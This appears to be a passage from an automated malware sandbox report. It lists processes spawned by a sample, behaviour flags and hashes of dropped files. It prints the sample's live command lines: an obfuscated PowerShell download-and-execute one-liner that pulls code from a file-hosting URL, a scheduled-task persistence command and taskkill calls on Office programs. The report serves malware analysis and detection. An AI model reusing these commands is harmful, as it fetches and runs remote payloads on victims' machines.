          Modifies Internet Explorer settings
          Modifies system certificate store
          Suspicious use of WriteProcessMemory
          PID:1288
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).invoke((('https://www.mediafire.com/file/ivgr6qe4jfzd1w9/14.dll/file'))));Invoke-Expression $MMMMMMM
            Blocklisted process makes network request
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of AdjustPrivilegeToken
            PID:1932
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 82 /tn calendersw /F /tr """C:\ProgramData\milon.com""""""https://www.mediafire.com/file/8pmejv253qhljtn/14.htm/file"""
            Creates scheduled task(s)
            PID:616
          • C:\Windows\SysWOW64\taskkill.exe
            "C:\Windows\System32\taskkill.exe" /f /im WinWord.exe
            Kills process with taskkill
            Suspicious use of AdjustPrivilegeToken
            PID:1356
          • C:\Windows\SysWOW64\taskkill.exe
            "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
            Kills process with taskkill
            Suspicious use of AdjustPrivilegeToken
            PID:1936
          • C:\Windows\SysWOW64\taskkill.exe
            "C:\Windows\System32\taskkill.exe" /f /im POWERPNT.exe
            Kills process with taskkill
            Suspicious use of AdjustPrivilegeToken
            PID:1916
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    Suspicious behavior: EnumeratesProcesses
    Suspicious behavior: GetForegroundWindowSpam
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of FindShellTrayWindow
    Suspicious use of SendNotifyMessage
    PID:1708
Network
MITRE ATT&CK Matrix
Collection | Command and Control | Credential Access | Execution | Exfiltration | Impact | Initial Access | Lateral Movement | Persistence | Privilege Escalation
                    Downloads
                    • C:\ProgramData\ddond.com
                      MD5    abdfc692d9fe43e2ba8fe6cb5a8cb95a
                      SHA1   d4f0397f83083e1c6fb0894187cc72aebcf2f34f
                      SHA256 949485ba939953642714ae6831d7dcb261691cac7cbb8c1a9220333801f60820
                      SHA512 c786bfb6a2316e43cb89901fae103157ec6b65117c292dc7570dd4685891b5afbb72064789b74bf55fe012c5936ed6468876e4d2cccdeff71b4abb2d76ff395f
                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_BACC6CD2B29F18349081C9FD2343833B
                      MD5    3cf20b6b98063387ba507e194b74843e
                      SHA1   8cd2595ca2b86ef38e4933a8f04dceea8330d831
                      SHA256 b99c9f41fdae863d1f3d1d7606368acebebacd569ed3bde9e7edb0e1ec60c40d
                      SHA512 a070b25a7e312ff598f10e701fbd5db2608f220b166220c93a23d98cc4902b584e3d02751267eff05fbf5123138646c1b07ac4a42ded4cc3ed85711ec8a5b204
                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\72BA427A91F50409B9EAC87F2B59B951_7113AA81F59D5AD048438D6378810119
                      MD5    135244d85a7513f8def7aa513137da29
                      SHA1   b67b5c9bad7e062dd7d25bed38e882ee527b1bc0
                      SHA256 f8b69146737db62aa94b02ea7b3124bd8ae3076cc46602f577e81af6b5f0ee11
                      SHA512 c4d6e0e5b861e6ecaaa1e2f328a65a7adda2ecdc873e9ae2887470445e5672b20024baffc6c34ff6e629807b01f22ef95ab1bb9125f004f3abdc0961d69f14dd
                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                      MD5    b9f21d8db36e88831e5352bb82c438b3
                      SHA1   4a3c330954f9f65a2f5fd7e55800e46ce228a3e2
                      SHA256 998e0209690a48ed33b79af30fc13851e3e3416bed97e3679b6030c10cab361e
                      SHA512 d4a2ac7c14227fbaf8b532398fb69053f0a0d913273f6917027c8cadbba80113fdbec20c2a7eb31b7bb57c99f9fdeccf8576be5f39346d8b564fc72fb1699476
                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                      MD5    b1c4234d2346ca5a2267de9f0bab4b81
                      SHA1   d6d10976b258ee86430063fdfb1838bb73838aeb
                      SHA256 e75d5e79323e42e337cf188a296db211f5d7dd488d03adf4b1be7836f997e3ed
                      SHA512 8b1d4c34ad847b73d060cb35dba350032be0a8cd82637a5c52805c078ea986ea44446040f588fb4edda4a233e424bdb6dc3ba016b7647936ec4ef4f971ff1e17
                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
                      MD5    a266bb7dcc38a562631361bbf61dd11b
                      SHA1   3b1efd3a66ea28b16697394703a72ca340a05bd5
                      SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
                      SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_BACC6CD2B29F18349081C9FD2343833B
                      MD5    3df3240355cb4ce678355a0ffae63363
                      SHA1   86f914815e50ddea52cc863f5dbf144fa1d63583
                      SHA256 710ab48ee7e0573fa4aba48942958b170d7a338e4f8bdb93959026a96314930d
                      SHA512 59f38d4a86a63e33423b3e772687d2914ab96e67665baac205d1cb2407b462efc9fccd9bd1eb654c274fe3c196d82845ce7daf3f04698162562d46e34380c19e
                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\72BA427A91F50409B9EAC87F2B59B951_7113AA81F59D5AD048438D6378810119
                      MD5    75f6b23d475f07e51eb733f315ceae4d
                      SHA1   60252a04ee5e709b907705e85d227f772accc3d8
                      SHA256 95193515514c8fb2f49591c2a7eed4cd30ecf6ed897d037919e5db086b784146
                      SHA512 ce3d635ccaa4fc74ec0190c038511faafebb0dbbb1beff423c8efceb51fc4fca90bb3aca791c95f26c91183d9f42931ea195ac1d3a6cdd51718f79b67f32bd2b
                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                      MD5    922ac55634f52d8090bfe34c6232039a
                      SHA1   572f2ad5474555786803a99d06689a06e9ea16d1
                      SHA256 82e080a861ae4859cbce544160689eac96f66b138557bc302bea3845885af14d
                      SHA512 d8fc6e4ac8da5e35947225ec150282cd5a47d5dc7154edfd266a913ab66badafdf8e503f9e052bb0ce8a8df468e9456e1938201d920246fb03d75c1cbb22b1ca
                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                      MD5    659c5d670cea9af779ba851f314a10f9
                      SHA1   b69b6ffebc9aabe0128cb111df0a733b2204ea10
                      SHA256 0aab40d27ce0d134ee07ee89282a70f6d7b29f28cf9810a4e410c969750fe7bc
                      SHA512 2f4cb9e137bd3674a8afd746f1ffe8f9c008ea82b29979b8b6920adce917da87fbb6254ae94bb9f30d1affb13b407f436929b960fc267dbfdc64350c3f54256e
                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
                      MD5    a09fdf3d11dc1839e284e39a86b053e4
                      SHA1   761b9af6540477769337176d1f3749a0ff416211
                      SHA256 8b1027e17644b600b89d741301a2a417d02b0739eb252a0a1690e89c41d658c3
                      SHA512 f995188ef86953ac847ba917fad2ca5ab995b7217715de8ae13b7ae79d2f1101a30e84bf3d3e0cf7903445e8f5c5e4bdfecff7160b193f078ea08596fd07d933
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0O8D7KIM\14.ppam.18hf937.partial
                      MD5    66367046957810309248fcec536d7ccb
                      SHA1   5a118ce3f251140e852927503a3743442c68ff63
                      SHA256 26c3bd6b866dd452546949e169dfd0934cf53681fe53d63efa2a16db39cf131b
                      SHA512 1698fc41e4fe3bfd61841e9ec50a2461583d58cc5fafb00fb3c6a31460b0b866a7c96762da22de840f2081fb8524808e0177697860582aed6b33365a62f1fd08
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\9A9RUEXR.txt
                      MD5    493fefb20f800e94b28df11ed3ae4325
                      SHA1   0fdd499347849296b4bd9160815ad76a35723187
                      SHA256 dc19103b9cebcab997fab6a7c4fff8ee1779ab98078965ed40f1822ddc6ca173
                      SHA512 474ce68165dd971731349d1bcf1cd8657dbdf2d7fd89182c8b174b639215abd486da91167c7d3778e3e59f2d1452c8b9e502acf3b2c93f3d9032baaa8a26923e
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\TF0BWJIV.txt
                      MD5    2fe2e5d80b48fbd7c3827de2c88f3460
                      SHA1   39c6cf96ab9843934f97f6994ed1a667f0e9c6f7
                      SHA256 b931f42e021526b9eee3057b3a47988f127bd84694a2aa33879ef51e8fcd039e
                      SHA512 b13884d752ff9874b1e07f60baae0893d4256656933da7e8be62b4a94e2eb71b5c5971ca99de1a4bbc61ce410941288572becd3d4c13509eeb470db1f45711bc
                    • \ProgramData\ddond.com
                      MD5    abdfc692d9fe43e2ba8fe6cb5a8cb95a
                      SHA1   d4f0397f83083e1c6fb0894187cc72aebcf2f34f
                      SHA256 949485ba939953642714ae6831d7dcb261691cac7cbb8c1a9220333801f60820
                      SHA512 c786bfb6a2316e43cb89901fae103157ec6b65117c292dc7570dd4685891b5afbb72064789b74bf55fe012c5936ed6468876e4d2cccdeff71b4abb2d76ff395f
                    • memory/288-60-0x0000000000000000-mapping.dmp
                    • memory/288-62-0x000007FEFB5D1000-0x000007FEFB5D3000-memory.dmp
                    • memory/616-86-0x0000000000000000-mapping.dmp
                    • memory/824-69-0x000000000050C000-0x0000000000529000-memory.dmp
                    • memory/824-68-0x000000000050C000-0x0000000000529000-memory.dmp
                    • memory/824-63-0x000000006C33D000-0x000000006C348000-memory.dmp
                    • memory/824-59-0x000000005FFF0000-0x0000000060000000-memory.dmp
                    • memory/824-58-0x000000006B351000-0x000000006B353000-memory.dmp
                    • memory/824-57-0x000000006DAA1000-0x000000006DAA5000-memory.dmp
                    • memory/824-56-0x0000000000000000-mapping.dmp
                    • memory/824-84-0x000000005FFF0000-0x0000000060000000-memory.dmp
                    • memory/1100-54-0x0000000074B51000-0x0000000074B53000-memory.dmp
                    • memory/1288-72-0x0000000000000000-mapping.dmp
                    • memory/1356-87-0x0000000000000000-mapping.dmp
                    • memory/1916-89-0x0000000000000000-mapping.dmp
                    • memory/1932-85-0x0000000000000000-mapping.dmp
                    • memory/1932-91-0x0000000072E40000-0x00000000733EB000-memory.dmp
                    • memory/1936-88-0x0000000000000000-mapping.dmp